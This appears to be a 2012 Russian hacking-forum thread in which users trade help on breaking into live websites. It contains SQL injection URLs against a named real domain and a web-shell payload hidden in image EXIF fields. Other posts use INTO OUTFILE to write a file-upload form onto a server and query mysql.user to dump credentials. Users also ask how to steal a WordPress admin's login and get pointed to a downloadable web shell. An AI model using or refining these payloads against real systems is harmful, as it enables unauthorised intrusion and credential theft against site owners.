Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. fiin

    fiin New Member

    Joined:
    25 Jan 2012
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Помогите пожалуйста с WP 2.9.2
    при переходе на _tp://www.site.com/?p=0 открывает главную страницу, но url в строке не меняется на _tp://www.site.com/
    А при переходе на _tp://www.site.com/?p=1 выдаёт
    и
    как мне подобраться к базе, вытащить лог. пасс. админа? Заранее спасибо
     
  2. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    Вопрос следующего плана: заливка шелла через картинку.

    Скрипт только переименовывает файлы в порядковый_номер.jpg Изменить расширение не представляется возможным. Далее через exif pilot по очереди в модель камеры, коменты и др. вставлял <?system($_GET[cmd])?> и подобные вариации. при запросе phpinfo - никакой реакции и ни в одном случае. Хотя коменты, шелл в самом файле - не режуться. просто переименовываются. В случае вызова шелла с расширением jpg - пишет - invalid format bla bla。В случае - картинка + комменты = просто картинка(( запрос: site.ru/3973819_77116-32x32x.jpg?cmd=phpinfo(); - вывод: только картинка.

    Залить .htaccess не получиться. Двиг самописный. В админке функций, что кот наплакал.

    Прошу подсказать варинты. Или забить?
     
  3. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    32
    Likes Received:
    5
    Reputations:
    1
    spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user
    http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27/var/www/properm.ru/htdocs/1.txt%27--+
    http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27tmp/1.txt%27--+

    что не так?Помогите докрутить.
     
  4. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    ты пути от фонаря нарисовал? там ковычка вызывает ошибку, тоесть фиг ты запишешь чтото в файл, да и права врятли есть


    вариант искать на сайте инклуд, иначе никак
     
    #20184 qaz, 19 Apr 2012
    Last edited: 19 Apr 2012
  5. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    Пытаюсь лить шелл,ничего не получается,при таком запросе +union+select+1,2,3,'<html>
    <head>
    <title>
    a
    </title>
    </head>
    <body>
    <form action="upload.php" method="post" enctype="multipart/form-data">
    <label for="file">Файл:</label><br/>
    <input type="file" name="file" id="file" class="input"/><br>
    <input type="submit" type=submit value="Отправить">
    </form>
    </body>
    </html>',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user+into+outfile+'/var/www/html/azaz.html'-- только лишь на странице с которой пытаюсь зальть шелл изменяется титл,но остается ошибка The following errors has been found:
    HS+ system error: MYSQL error:1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ' at line 3 (# 256).
    The following will be reported to the Administrator:
    Error in line 7 of file /var/www/html/PHPscripts/error_inc.php..А файл залить не удается
     
  6. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
  7. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    А как их обойти можно?
     
  8. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204

    Только HTML формы, только хардкод!!11

    1. Да, там magic_quotes.
    Обойти можно, только если данные из SQL-запроса используються в дальнейших запросах.
    Вот сам способ:
    http://forum.antichat.ru/showpost.php?p=663815&postcount=39

    2. Ты уверен, что у твоего пользователя есть file_priv? =\

    3. HTML - это крута!!1
     
  9. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    Уверен что у него Y я файлы могу читать
     
  10. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    Даже те методы обхода не помогают или я не понл как им пользоваться
     
  11. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
    Значит не повезло.
    Делай
    Code:
    select concat_ws(0x3a,Host,User,Password,File_priv) from mysql.user
    Дальше ищи phpmyadmin.
     
  12. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    А как его найти?
     
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    ищеш дерикторю
    http://forum.antichat.ru/showpost.php?p=3107725&postcount=2
     
  14. x1ds

    x1ds New Member

    Joined:
    18 Apr 2011
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Возник вопрос:
    Как вывести все базы данных database() ?
     
  15. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    824
    Likes Received:
    350
    Reputations:
    120
    schema_name from information_schema.schemata
     
  16. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    а можно подобнее? где что смотреть что гуглить?
     
  17. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    170
    Likes Received:
    30
    Reputations:
    1
    Есть сайт,на нём у меня шелл,права www-data , прав на запись нет, вопрос, как можно сделать дамп сайта?
     
  18. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    Подскажите, кто-нибудь пользовался данной багой?
    Если наглядный пример использования?

    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1180

    Nginx buffer underflow vulnerability

    Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.
    Affected items
    Web Server
    The impact of this vulnerability
    Remote attackers may execute arbitrary code via crafted HTTP requests.
     
  19. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,127
    Likes Received:
    602
    Reputations:
    684
    ставишь шелл http://profexer.name/pas/download.php

    - Файловый менеджер :
    групповое удаление, перемещение, копирование, скачка и загрузка файлов и директорий.
    переименование и создание файлов и директорий.
    правка, просмотр, изменении атрибутов файлов.
    поиск файлов и директорий, текста в файлах.
    Нормально все работает, просто вводи желаемый логин и пароль - скачаешь зашифрованный шелл. Только не забудь потом эти самый логин/пароль - подсмотреть их не будет где
     
    _________________________
    #20199 shell_c0de, 20 Apr 2012
    Last edited: 20 Apr 2012
  20. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    170
    Likes Received:
    30
    Reputations:
    1

    есть еще шеллы на подобие этого?
    именно этот не хочет работать
     
Loading...
Thread Status:
Not open for further replies.